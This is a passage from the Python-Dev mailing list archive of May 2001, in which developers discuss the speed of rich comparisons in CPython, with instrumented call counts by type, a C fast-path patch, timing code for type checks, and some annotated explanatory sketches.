#lens_decide: 0
--------------------------------------
rest(computed): 2222164
#comps: 2949421
#memcmps: 917776

So still, ca. 30% can be decided by first byte. It still appears that the total number of calls to memcmp is higher when the length is not taken into consideration. To verify this claim, I've counted the cases where the length decides the outcome, but looking at the first byte also had:

lens_decide: 1784897
lens_decide_firstbyte_wouldhave:1671148

So in 6% of the cases, checking the length alone gives a decision which looking at the first byte doesn't; plus it saves a function call. To support the thesis that Py_EQ is the common case for strings, I counted the various operations:

pyEQ:2271593
pyLE:9234
pyGE:0
pyNE:20470
pyLT:22765
pyGT:578

Now, that might be flawed since comparing strings for equal is extremely frequent in the testsuite. To give more credibility to the data, I also ran setup.py with my instrumented ./python:

riches:21640
riches_ni:76
riches_ni1:0
idents:2885
idents_decide:2885
lens_decide:9472
lens_decide_firstbyte_wouldhave:6223
comps:26360
memcmps:19224
pyEQ:20093
pyLE:46
pyGE:1
pyNE:548
pyLT:876
pyGT:0

That shows that optimizing for Py_NE is not worth it. With these data, I'll upload a patch to SF.
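Martin's counts suggest a cheapest-first decision order for string equality: identity, then length, then the first character, and only then a full comparison. A small Python model of that order, with counters loosely analogous to his instrumentation, is sketched below. The counter names are made up for illustration, and a Python-level slice comparison stands in for `memcmp`.

```python
from collections import Counter

# Which step settled each comparison (names are illustrative only).
stats = Counter()


def str_eq(a: str, b: str) -> bool:
    """Model of a string equality fast path, cheapest test first."""
    if a is b:                       # same object: equal without looking
        stats["identity"] += 1
        return True
    if len(a) != len(b):             # different lengths can never be equal
        stats["length"] += 1
        return False
    if not a:                        # both empty but not the same object
        stats["empty"] += 1
        return True
    if a[0] != b[0]:                 # first character settles many mismatches
        stats["first_char"] += 1
        return False
    stats["full_compare"] += 1       # only now pay for the full comparison
    return a[1:] == b[1:]            # stands in for memcmp on the remainder
```

The length test is what Martin's second run removes; in this model, dropping it would send unequal-length strings on to the first-character and full-comparison steps.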
Regards, Martin From tim at digicool.com Tue May 15 22:22:37 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 15 May 2001 16:22:37 -0400 Subject: [Python-Dev] Comparison corner case Message-ID: Here from the tail end of a patch comment. If you believe the illustrated behavior is wrong, then I don't believe we gain anything from using the tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain for the latter is that it allows EQ/NE tuple comparison to work correctly on tuples containing elements that support only EQ/NE comparisons): """ BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, because it won't believe there's any difference unless Py_EQ returns false for some corresponding elements: >>> class C: ... def __lt__(x, y): return 1 ... __eq__ = __lt__ ... >>> C() < C() 1 >>> (C(),) < (C(),) 0 >>> That doesn't make sense -- provided you believe the defn. of C makes sense. """ From guido at digicool.com Tue May 15 23:36:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 16:36:57 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST." References: Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Tim wrote: > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ returns false > for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C makes sense. I think in this example the problem is with C, not with the tuple algorithm. The question is, what are you going to do otherwise? You could test for < first, == second -- but that means twice as many comparisons, and for reasonably-behaved items it makes no difference at all. 
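Guido's point can be made concrete with a model of the sequence algorithm Tim describes: scan for the first position where the elements are not `==`, then apply the requested operator to that pair, or to the lengths if no such pair exists. This is a Python sketch, not the C code in `tupleobject.c`, and `seq_richcompare` is a hypothetical name.

```python
import operator


def seq_richcompare(v, w, op):
    """Lexicographic compare: find the first pair that is not ==, then apply op."""
    for a, b in zip(v, w):
        if not a == b:        # first position where the items differ
            return op(a, b)
    # Every shared position compared equal, so the lengths decide.
    return op(len(v), len(w))


class C:
    """Tim's example: both < and == always answer true."""
    def __lt__(self, other):
        return True
    __eq__ = __lt__


print(C() < C())                                      # True
print(seq_richcompare((C(),), (C(),), operator.lt))   # False
print(seq_richcompare((1, 2), (1, 3), operator.lt))   # True
```

Because `C` claims its instances are all equal, the scan never finds a differing pair and the comparison falls through to `1 < 1`. Python 3's built-in tuples give the same `False` for `(C(),) < (C(),)`. One difference from today's CPython is worth knowing: the real tuple code treats identical objects as equal before calling `==`, so with `nan = float('nan')`, `(nan,) == (nan,)` is true even though `nan == nan` is false. The sketch above has no such shortcut.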
--Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Tue May 15 22:59:56 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 22:59:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> > Of course. But except for instance objects, answering "does the type > implement tp_richcompare?" is one lousy pointer check Almost - you also have to check the type flag. > and the answer will usually be-- provided we don't start stuffing > code into *every* object's tp_richcompare slot! --"no, so I can go > to tp_compare immediately". Coercions and richcmps are the oddball > cases today. I'd like to add another data point, answering the question what types are most frequently compared. The first set of data is for running the Python testsuite.

riches 3040952 # Calls to PyType_RichCompare
eqs 2828345 # Calls where the types are equal
String 2323122
Float 141507
Int 125187
Type 99477
Tuple 84503
Long 30325
Unicode 10782
Instance 9335
List 2997
None 383
Class 318
Complex 219
Dict 57
Array 49
WeakRef 34
Function 11
File 11
SRE_Pattern 10
CFunction 9
Lock 8
Module 1

So strings cover 82% of all the compare calls of equally-typed objects, followed by floats with 5%. Calls between equally-typed objects in turn make up 93% of all richcompare calls. Since this might give a blurred view of what is actually used in applications, I ran the PyXML testsuite with that python binary also. Leaving out types that are not used, I get

riches 88465
eqs 59279
String 48097
Int 5681
Type 3170
Tuple 760
List 492
Float 332
Instance 269
Unicode 243
None 225
SRE_Pattern 4
Long 3
Complex 3

The first observation here is that "only" 67% of the calls are with equally-typed objects. Of those, 80% are with strings, 9% with integers. The last example is IDLE, where I just did an "import httplib", for fun.
riches 50923
eqs 49882
String 31198
Tuple 8312
Type 7978
Int 1456
None 600
SRE_Pattern 210
List 122
Instance 4
Float 1
Instance method 1

Roughly the same picture: 97% of calls are with equally-typed objects; of those, 62% are strings and 3% integers. Notice the 15% each for tuples and types. So speeding up the common case clearly means speeding up string comparisons. If I needed to optimize anything else afterwards, I'd look into type objects - most likely, they are compared for EQ, which can be done nicely and directly in a tp_richcompare also. Those two optimizations together would give a richcompare to 95% of the objects in the IDLE case. Regards, Martin From guido at digicool.com Wed May 16 00:41:12 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 17:41:12 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200." <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> I'm curious where the frequent comparisons of types come from. Is there lots of code that does frequent assert type(x) == T typechecking? Does isinstance(x, T) perhaps use EQ? --Guido van Rossum (home page: http://www.python.org/~guido/) From barry at digicool.com Tue May 15 23:51:00 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 17:51:00 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.42180.401918.223487@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> I'm curious where the frequent comparisons of types come GvR> from. GvR> Is there lots of code that does frequent GvR> assert type(x) == T GvR> typechecking? GvR> Does isinstance(x, T) perhaps use EQ? Not to mention the several hundred comparisons to None.
From jeremy at digicool.com Tue May 15 19:26:54 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:26:54 -0400 (EDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.26334.610144.846269@slothrop.digicool.com> I only learned recently that isinstance() can be called with types instead of classes. I suppose the name led me in the wrong direction. I had the silly idea that it only applied to instances <0.1 wink>. So it comes as little surprise to me that there is a lot of code executed in, e.g., the test suite that does comparisons on types. In the Lib directory, there are 63 files that use == and the builtin type function. (Simple grep.) A total of 139 instances of this idiom. A cursory scan suggests that most of the calls are things like type(obj) == type(''). In the Zope source tree, there are 58 files and 98 individual occurrences. It again looks like comparisons against the string type are the most common. I can think of two common cases where an object is checked against the string type. One is an interface that takes a file-like object or its path. The other is an interface that takes a sequence, but doesn't want to try a string as a sequence. Sounds like we ought to do a search-and-destroy on type comparisons, replacing with isinstance() where possible.
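Replacing `type(obj) == type('')` with `isinstance()` is not purely a speed change: `isinstance()` also accepts subclasses, which is usually what an interface wants. A small sketch of Jeremy's first case (a function taking either a path or a file-like object), assuming Python 3, where `str` plays the role of 2001's `StringType`; `TaggedStr` and `read_text` are hypothetical names.

```python
import io


class TaggedStr(str):
    """Hypothetical str subclass, e.g. a path that carries extra metadata."""


def read_text(source):
    """Accept a path (any str, including subclasses) or a file-like object."""
    if isinstance(source, str):     # `type(source) == str` would reject TaggedStr
        with open(source, encoding="utf-8") as f:
            return f.read()
    return source.read()            # assumed to be file-like


s = TaggedStr("notes.txt")
print(type(s) == str)                      # False
print(isinstance(s, str))                  # True
print(read_text(io.StringIO("hello")))     # hello
```

Where an exact type match really is required, `type(obj) is T` states that intent directly and avoids invoking `==` on type objects at all.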
Jeremy From jeremy at digicool.com Tue May 15 19:41:58 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:41:58 -0400 (EDT) Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <20010515115120.A14357@glacier.fnational.com> References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> <20010515115120.A14357@glacier.fnational.com> Message-ID: <15105.27238.582785.851371@slothrop.digicool.com> I downloaded one of the files, but the quicktime player I have on my Windows box said it didn't understand the file format. I eventually got the streaming version at 100kbps to "work" where work meant mostly an audio feed and occasional stills that were recognizable. Jeremy PS It was cool to watch the one on compilation. Mat Hostetter, one of the panelists, is my old roommate! From barry at digicool.com Wed May 16 00:56:10 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 18:56:10 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <15105.46090.203278.397835@anthem.wooz.org> >>>>> "JH" == Jeremy Hylton writes: JH> I only learned recently that isinstance() can be called with JH> types instead of classes. I suppose the name lead me in the JH> wrong direction. I had the silly idea that it only applied to JH> instances <0.1 wink>. JH> So it comes as little surprise to me that there is a lot of JH> code executed in, e.g., the test suite that does comparisons JH> on types. JH> In the Lib directory, there are 63 files that use == and the JH> builtin type function. (Simple grep.) A total of 139 JH> instances of this idiom. A cursory scan suggests that most of JH> the call are things like type(obj) == type('').
Even without the forward-looking insight that types are classes, I think type comparisons should have been done with `is' and not ==. So old school type comparisons should have been done as

    type(obj) is StringType

whereas new school type comparisons should be done as

    isinstance(obj, StringType)

With Python 2.1, == is naturally slower than `is', but isinstance() comes in somewhere in the middle.

563897.802881 is comparisons per second
506827.201066 == comparisons per second
520696.916088 isinstance() comparisons per second

-Barry

-------------------- snip snip --------------------
from types import StringType
import time

r = range(1000000)

def one(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) is StringType
    t1 = time.time() - t0
    print len(r) / t1, 'is comparisons per second'

def two(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) == StringType
    t1 = time.time() - t0
    print len(r) / t1, '== comparisons per second'

def three(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        isinstance(x, StringType)
    t1 = time.time() - t0
    print len(r) / t1, 'isinstance() comparisons per second'

one()
two()
three()

From tim.one at home.com Wed May 16 01:49:03 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 19:49:03 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: Making the 5am email concrete, this is what I meant: Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -c -r2.131 object.c *** object.c 2001/05/11 03:36:45 2.131 --- object.c 2001/05/15 23:39:24 *************** *** 835,841 **** } } else { ! res = do_richcmp(v, w, op); } compare_nesting--; return res; --- 835,863 ---- } } else { ! cmpfunc f; ! if (v->ob_type == w->ob_type ! && RICHCOMPARE(v->ob_type) == NULL ! && (f = v->ob_type->tp_compare) != NULL) ! { ! int c = (*f)(v, w); !
if (c < 0 && PyErr_Occurred()) ! res = NULL; ! else { ! switch (op) { ! case Py_LT: c = c < 0; break; ! case Py_LE: c = c <= 0; break; ! case Py_EQ: c = c == 0; break; ! case Py_NE: c = c != 0; break; ! case Py_GT: c = c > 0; break; ! case Py_GE: c = c >= 0; break; ! } ! res = c ? Py_True : Py_False; ! Py_INCREF(res); ! } ! } ! else ! res = do_richcmp(v, w, op); } compare_nesting--; return res; That's a local change to PyObject_RichCompare, taking a fast path for most scalar types (which don't have richcmps but do have tp_compare today). On my Win98 box reproducible timings are impossible, but it obviously chops out layers and layers of function calls and redundant tests when it triggers. That appears to be more often than not across all apps I've tried, from 60% of PyObject_RichCompare calls to nearly 100%. From tim.one at home.com Wed May 16 02:01:05 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 20:01:05 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Message-ID: [Tim] > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ > returns false for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C > makes sense. [Guido] > I think in this example the problem is with C, not with the tuple > algorithm. I can live with that. > The question is, what are you going to do otherwise? You > could test for < first, == second -- but that means twice as many > comparisons, and for reasonably-behaved items it makes no difference > at all. The question remaining is how much of this list/tuple richcmp behavior is guaranteed by the language and how much is just implementation-dependent fuzz. 
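A rough Python 3 model of the tuple/list rule being debated may make Tim's example easier to follow: scan for the first position where `==` says the items differ, let that one pair decide, and fall back to comparing lengths when every shared item compared equal. This is a simplified sketch, not CPython's C code (the real implementation has further shortcuts), and `seq_richcompare` and `C` are illustrative names.

```python
import operator


def seq_richcompare(v, w, op):
    """Simplified model of lexicographic tuple/list comparison."""
    # Scan for the first position where the items are not reported equal.
    for x, y in zip(v, w):
        if not x == y:
            # The first differing pair alone decides the result.
            return op(x, y)
    # Every shared position compared equal, so the lengths decide.
    return op(len(v), len(w))


class C:
    # Tim's pathological class: __lt__ and __eq__ both always answer "yes".
    def __lt__(self, other):
        return True

    __eq__ = __lt__


print(C() < C())                                     # True
print(seq_richcompare((C(),), (C(),), operator.lt))  # False: __eq__ says "equal", then 1 < 1
print((C(),) < (C(),))                               # False in CPython as well
```

Guido's alternative (asking `<` before `==` at each position) would roughly double the number of item comparisons for well-behaved types, which is the cost he is pointing at.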
For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple richcmp early-exit test because I never found code that made it trigger (but tons of code that gets there without triggering). But this has semantic implications too: an implementation without the early exit may call user-defined comparison routines that raise exceptions when comparing tuples of different lengths now. Do you care? (I don't.) From tim.one at home.com Wed May 16 02:37:56 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 20:37:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I'd like to add another data point, answering the question what types > are most frequently compared. That varies wildly by app. I have apps where int compares *overwhelmingly* dominate, others where float compares do, many where string compares do, and the last code I wrote for Zope spends most of its (very substantial) time doing lookups of "object ids" in dicts. In Python terms, those are Pythong lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and that's another case where ceval.c's special-casing of int compares is impotent. Heck, sort a large homogeneous array once, and whatever element type that array has will likely dominate comparisons for the whole app! That's why I'm so keen to chop out a half dozen layers of blubber for *all* types that don't play the richcmp game (which today includes every type I mentioned above). > The first set of data is for running the Python testsuite.
>
> riches  3040952   # Calls to PyType_RichCompare
> eqs     2828345   # Calls where the types are equal
>
> String       2323122
> Float         141507
> Int           125187
> Type           99477
> Tuple          84503
> Long           30325
> Unicode        10782
> Instance        9335
> List            2997
> None             383
> Class            318
> Complex          219
> Dict              57
> Array             49
> WeakRef           34
> Function          11
> File              11
> SRE_Pattern       10
> CFunction          9
> Lock               8
> Module             1
>
> So strings cover 82% of all the compare calls of equally-typed objects, followed by floats with 5%. Those calls together cover 93% of the richcompare calls.
>
> Since this might give a blurred view of what is actually used in applications,

Note that the top 4 types don't have a tp_richcompare slot today. The tuples are likely composed of simple scalar types, and the latter benefit too. But as above, we can't say anything in advance about the *specific* types a given app is going to compare most often. There is no "typical app" in that respect.

> I ran the PyXML testsuite with that python binary also. Leaving out types that are not used, I get
>
> riches  88465
> eqs     59279
>
> String       48097
> Int           5681
> Type          3170
> Tuple          760
> List           492
> Float          332
> Instance       269
> Unicode        243
> None           225
> SRE_Pattern      4
> Long             3
> Complex          3
>
> The first observation here is that "only" 67% of the calls are with equally-typed objects.

Someone who cares about the speed of PyXML would be well advised to figure out why <0.9 wink>: there's no scheme on the horizon that will speed mixed-type comparisons one whit.

> Of those, 80% are with strings, 9% with integers.

XML is a string-crunching app, right?

> The last example is idle, where I just did an "import httplib", for fun.
>
> riches  50923
> eqs     49882
>
> String           31198
> Tuple             8312
> Type              7978
> Int               1456
> None               600
> SRE_Pattern        210
> List               122
> Instance             4
> Float                1
> Instance method      1
>
> Roughly the same picture: 97% calls with equally-typed objects, of those 62% strings, 3% integers. Notice the 15% for tuples and types, each. Surprising!
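The headline percentages can be re-derived from the test-suite counts. A small Python 3 sketch (the `share` helper and variable names are illustrative, not from the thread):

```python
# Counts from the Python test-suite run quoted above.
riches = 3040952  # all rich-compare calls
eqs = 2828345     # calls where both operands had the same type
same_type_counts = {"String": 2323122, "Float": 141507, "Int": 125187}


def share(part, whole):
    """Return `part` as a percentage of `whole`."""
    return 100.0 * part / whole


for name, count in same_type_counts.items():
    print(f"{name:<7} {share(count, eqs):5.1f}% of same-type calls")
print(f"same-type calls are {share(eqs, riches):.1f}% of all calls")
```

This gives about 82.1% for strings and 5.0% for floats among same-type calls. The 93% figure matches eqs/riches, the share of calls whose operands have the same type; strings plus floats together are about 87% of the same-type calls.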
> So to speed-up the common case clearly means to speed-up string > comparisons. The only thing the apps I've tried have in common is that the types compared most often do have tp_compare but not tp_richcompare functions. The test suite, XML and IDLE are all heavy string-slingers. > If I'd need to optimize anything else afterwards, I'd look into type > objects - most likely, they are compared for EQ, which can be done > nicely and directly in a tp_richcompare also. Would do just as well to give them a one-liner tp_compare function (in conjunction with the posted patch). > Those two optimizations together would give a richcompare to 95% of > the objects in the IDLE case. Since that's the exact opposite of what I want to do, it's at least interesting. Whatever, there needs to be a (very) fast path, and it needs to pick on something that all common types implement, including at least strings, ints, longs, floats and-- I guess --type objects. I don't know about other people, but I have lots of code that uses the cmp() function heavily. That path has also gotten bloated, and tries each of Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes". It does this now even if the tp_compare slot is defined. The only thing that's saving cmp()-slinging code from major sloth now is that the basic types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out early (before doing the three-way Py_EQ etc dance). But give the basic scalar types richcmp functions, and cmp() will slow down a lot (unless more hacks are added to stop that). From greg at cosc.canterbury.ac.nz Wed May 16 03:58:05 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 16 May 2001 13:58:05 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Tim Peters : > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ What Pythonistas wear on their feet?
Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz      +--------------------------------------+

From esr at thyrsus.com Wed May 16 04:27:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Tue, 15 May 2001 22:27:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200 References: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Message-ID: <20010515222738.A9996@thyrsus.com> Greg Ewing : > Tim Peters : > > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > What Pythonistas wear on their feet? No, man. It's what sexy lady Pythonistas wear on the beach in Rio. (Yes, I know some sexy lady Pythonistas. No, you can't have their phone numbers. Pthfthfthpht...) -- Eric S. Raymond Question with boldness even the existence of a God; because, if there be one, he must more approve the homage of reason, than that of blindfolded fear.... Do not be frightened from this inquiry from any fear of its consequences. If it ends in the belief that there is no God, you will find incitements to virtue in the comfort and pleasantness you feel in its exercise... -- Thomas Jefferson, in a 1787 letter to his nephew From tim.one at home.com Wed May 16 09:14:25 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 03:14:25 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3B00E98E.1C44FF5@lemburg.com> Message-ID: [MAL] > Round-tripping is obviously very important if you use Unicode > as basis for working on text. Since I use 7-bit ASCII exclusively, I've been using

    encode = decode = lambda x: x

I haven't proved that's round-trippable, but haven't bumped into an exception yet.
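For a single-byte (character map) codec, round-tripping means every one of the 256 byte values survives bytes -> Unicode -> bytes unchanged, and that is easy to check mechanically. A minimal Python 3 sketch; `roundtrip_failures` is a hypothetical helper, and the check is only meaningful for single-byte codecs:

```python
def roundtrip_failures(encoding):
    """Return the byte values 0..255 that don't survive bytes -> str -> bytes."""
    failures = []
    for value in range(256):
        raw = bytes([value])
        try:
            if raw.decode(encoding).encode(encoding) != raw:
                failures.append(value)
        except UnicodeError:
            # A byte that cannot be decoded (or re-encoded) also fails the test.
            failures.append(value)
    return failures


print(roundtrip_failures("latin-1"))     # []
print(len(roundtrip_failures("ascii")))  # 128: bytes 0x80-0xFF are undefined
print(roundtrip_failures("cp875"))       # depends on the tables in your Python
```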
> I don't know about the reasoning behind making cp875 fail the > round-trip -- Unicode certainly provides means to make mappings > round-trip safe (e.g. by reverting to the private Unicode > char. point areas). Then I ignorantly but confidently (indeed, with the cheery confidence only the truly ignorant can truly enjoy!) vote for your approach that maps the non-round-trippable cp875 code points to None. Better safe than sorry, by default. Else 6 of the 7 ambiguous chars will be silent surprises by default. From tim.one at home.com Wed May 16 09:25:28 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 03:25:28 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > PEP 207 is quite explicit that == and != are not to be assumed each > other's complement. It is silent on the x==x issue but the PEP > mentions IEEE 754 so I agree that this also shouldn't be cut short. It's explicit about x==x too: (Note: Python currently assumes that x==x is always true and x!=x is never true; this should not be assumed.) That's from the end of point #4, under "Proposed Resolutions". I agreed then, and still do. From martin at loewis.home.cs.tu-berlin.de Wed May 16 09:28:45 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:28:45 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT)) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> > Sounds like we ought to do a search-and-destroy on type comparisons, > replacing with isinstance() where possible.
At least in my applications, this is unfortunately not possible: I want a test for byte-string-or-unicode-string. This could be done with two isinstance calls, but that is certainly less efficient. Marc-Andre once proposed a type representing the immediate supertype of both byte strings and unicode strings; let's call it abstract string. Then I could write isinstance(e, types.AbstractString). Regards, Martin From martin at loewis.home.cs.tu-berlin.de Wed May 16 09:24:56 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:24:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org> Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de> > GvR> I'm curious where the frequent comparisons of types come > GvR> from. > > Not to mention the several hundred comparisons to None. This is harder to analyse; I set a gdb breakpoint on the place where RichCompare gets PyType_Type, then tried to see what it does, then ignoring the breakpoint a few times. This is what I've found; I may miss important cases. In PyXML, the expression type(e) in [types.StringType, types.UnicodeType] is frequently computed. This is a sequence_contains, which in turn does two Py_EQ tests. In addition, compile.c:com_add has t = Py_BuildValue("(OO)", v, v->ob_type) PyDict_GetItem(dict, t) Again, the dictionary lookup performs Py_EQ on the tuples, which does Py_EQ on the elements. This also accounts for the RichCompare calls which receive None: v may be None, here, so t is (None, type(None)). In IDLE, the situation is similar. com_add produces many compares with types. In addition, sre.compile has type(s) in sre_compile.STRING_TYPES which is the same test as the PyXML one. 
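The `type(e) in [types.StringType, types.UnicodeType]` idiom builds a list and may do two `==` type comparisons per call. From Python 2.2 on, isinstance() also accepts a tuple of types, so the same check becomes a single call. A Python 3 sketch, with `str` and `bytes` standing in for the 2001 Unicode and byte string types and hypothetical function names; note that the two forms disagree for subclasses:

```python
def is_any_string_2001(e):
    # The idiom found in PyXML and sre: an exact-type membership test.
    return type(e) in [str, bytes]


def is_any_string(e):
    # isinstance() with a tuple of types: one call, and subclasses count too.
    return isinstance(e, (str, bytes))


class Tag(str):
    """A str subclass, to show where the two checks disagree."""


print(is_any_string_2001("abc"), is_any_string("abc"))            # True True
print(is_any_string_2001(Tag("abc")), is_any_string(Tag("abc")))  # False True
```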
Finally, there is a type-in-typetuple test inside Tkinter._cnfmerge. Regards, Martin From i_sofer at yahoo.com Wed May 16 09:53:25 2001 From: i_sofer at yahoo.com (Idan Sofer) Date: 16 May 2001 10:53:25 +0300 Subject: [Python-Dev] Bug report: empty dictionary as default class argument Message-ID: <200105160756.KAA29616@alpha.netvision.net.il> Hello. I have found a rather annoying bug in Python, present in both Python 1.5 and Python 2.0. If a class has an argument with a default of an empty dictionary, then all instances of the same class will point to the same dictionary, unless the dictionary is explicitly defined by the constructor. I attach a piece of code that demonstrates the problem. -------------- next part -------------- A non-text attachment was scrubbed... Name: test.py Type: text/x-python Size: 1197 bytes Desc: not available URL: From martin at loewis.home.cs.tu-berlin.de Wed May 16 10:02:01 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 10:02:01 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> > Since that's the exact opposite of what I want to do, it's at least > interesting. I'll put a patch on SF soon which does what you want to do, i.e. tries tp_compare as the first thing if tp_richcompare is not there. Even with this patch, your code is faster if strings have a richcompare. Without richcompare, I get

    0.720 0.720 0.720 0.730 0.720 0.720 0.730 0.720 0.720 0.730

With it, I get

    0.710 0.720 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720

Given that stock CVS python is in the 0.78 range, the difference is negligible, though.
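The core of "try tp_compare first when there is no tp_richcompare" is turning one three-way result c (negative, zero or positive) into the boolean for the requested operator, as the switch in Tim's posted patch does. A Python 3 sketch of that mapping; the opcode strings, `rich_from_three_way` and `three_way` are illustrative stand-ins for Py_LT and friends and for a type's tp_compare slot:

```python
# Test applied to the three-way result c for each rich-comparison opcode,
# mirroring the switch statement in Tim's posted patch.
FROM_THREE_WAY = {
    "LT": lambda c: c < 0,
    "LE": lambda c: c <= 0,
    "EQ": lambda c: c == 0,
    "NE": lambda c: c != 0,
    "GT": lambda c: c > 0,
    "GE": lambda c: c >= 0,
}


def rich_from_three_way(compare, v, w, op):
    """Answer a rich comparison using only a three-way compare function."""
    c = compare(v, w)  # negative, zero or positive, like tp_compare
    return FROM_THREE_WAY[op](c)


def three_way(a, b):
    # Stand-in for a type's tp_compare slot (Python 3 has no builtin cmp()).
    return (a > b) - (a < b)


print(rich_from_three_way(three_way, "abc", "abd", "LT"))  # True
print(rich_from_three_way(three_way, 3, 3, "NE"))          # False
```

In the C patch a negative result may also signal an error, hence the `c < 0 && PyErr_Occurred()` check; in this Python model an error simply propagates as an exception raised by `compare`.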
